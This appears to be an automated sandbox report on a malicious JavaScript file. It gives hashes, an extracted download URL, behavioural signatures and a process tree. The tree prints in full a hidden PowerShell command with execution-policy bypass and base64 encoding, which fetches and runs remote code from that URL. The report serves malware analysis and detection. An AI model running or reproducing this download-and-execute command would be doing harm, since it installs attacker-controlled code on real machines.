Analysis
-
max time kernel
261s -
max time network
320s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
28/12/2023, 21:52
Static task
static1
Behavioral task
behavioral1
Sample
fab839dff3a6cd84eb5cc3e2402dbe4e.js
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
fab839dff3a6cd84eb5cc3e2402dbe4e.js
Resource
win10v2004-20231215-en
General
-
Target
fab839dff3a6cd84eb5cc3e2402dbe4e.js
-
Size
112KB
-
MD5
fab839dff3a6cd84eb5cc3e2402dbe4e
-
SHA1
fddec087ccbb499446502746eede1620c5aa69c7
-
SHA256
8b2a07f2c7959dfa4f95b80d28357fc8b36fb25715b06c5a2b770e9b7b1bf532
-
SHA512
4fe392466c0d069c12773d862a40e614cf1052e09410f1d13f8375f8b3748c6f4d29a10a4ba1122654dbca1b5444302445ef16bc4e96d91c10ed65c1a5d8b360
-
SSDEEP
3072:59Ry98guHVBqqg2bcruzUHmLKeMMU7GwbWBPwVGWl9SZ8kV8Gd5bzIvt/4g5eaXj:59Ry9RuXqW4SzUHmLKeMMU7GwWBPwVG0
Malware Config
Extracted
http://smart-integrator.hr/pornhub.php
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 3 672 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 672 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 672 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1832 wrote to memory of 2168 1832 wscript.exe 26 PID 1832 wrote to memory of 2168 1832 wscript.exe 26 PID 1832 wrote to memory of 2168 1832 wscript.exe 26 PID 2168 wrote to memory of 672 2168 cmd.exe 28 PID 2168 wrote to memory of 672 2168 cmd.exe 28 PID 2168 wrote to memory of 672 2168 cmd.exe 28
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\fab839dff3a6cd84eb5cc3e2402dbe4e.js1⤵
- Suspicious use of WriteProcessMemory
PID:1832 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA2⤵
- Suspicious use of WriteProcessMemory
PID:2168 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:672
-
-